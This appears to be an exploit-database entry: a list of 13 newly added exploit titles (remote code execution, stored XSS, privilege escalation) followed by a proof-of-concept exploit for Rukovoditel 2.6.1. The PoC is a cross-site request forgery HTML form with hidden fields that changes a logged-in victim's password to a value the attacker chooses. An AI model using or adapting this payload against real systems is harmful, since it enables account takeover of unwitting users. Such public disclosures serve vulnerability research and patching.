d7c025fc8d
13 changes to exploits/shellcodes System Explorer 7.0.0 - 'SystemExplorerHelpService' Unquoted Service Path Rukovoditel 2.6.1 - Cross-Site Request Forgery (Change password) LibreNMS 1.46 - MAC Accounting Graph Authenticated SQL Injection MiniWeb HTTP Server 0.8.19 - Buffer Overflow (PoC) Seacms 11.1 - 'ip and weburl' Remote Command Execution Seacms 11.1 - 'file' Local File Inclusion Seacms 11.1 - 'checkuser' Stored XSS WordPress Plugin Total Upkeep 1.14.9 - Database and Files Backup Download Rumble Mail Server 0.51.3135 - 'servername' Stored XSS Rumble Mail Server 0.51.3135 - 'domain and path' Stored XSS Rumble Mail Server 0.51.3135 - 'username' Stored XSS Macally WIFISD2-2A82 2.000.010 - Guest to Root Privilege Escalation Gitlab 11.4.7 - Remote Code Execution
30 lines
No EOL
907 B
Text
30 lines
No EOL
907 B
Text
# Exploit Title: Rukovoditel 2.6.1 - Cross-Site Request Forgery (Change
|
|
password)
|
|
# Date: 2020-12-14
|
|
# Exploit Author: KeopssGroup0day,Inc
|
|
# Vendor Homepage: https://www.rukovoditel.net/
|
|
# Software Link: https://www.rukovoditel.net/download.php
|
|
# Version: v2.6.1
|
|
# Tested on: Kali Linux
|
|
|
|
POC(localhost/index.php?module=users/change_password):
|
|
|
|
<html>
|
|
<!-- CSRF PoC -->
|
|
<body>
|
|
<script>history.pushState('', '', '/')</script>
|
|
<form
|
|
action="https://localhost/index.php?module=users/change_password&action=change"
|
|
method="POST">
|
|
<input type="hidden" name="form_session_token"
|
|
value="D^HUyTDh0X" />
|
|
<input type="hidden" name="password_new" value="123456789" />
|
|
<input type="hidden" name="password_confirmation"
|
|
value="123456789" />
|
|
<input type="submit" value="Submit request" />
|
|
</form>
|
|
</body>
|
|
</html>
|
|
|
|
|
|
-- |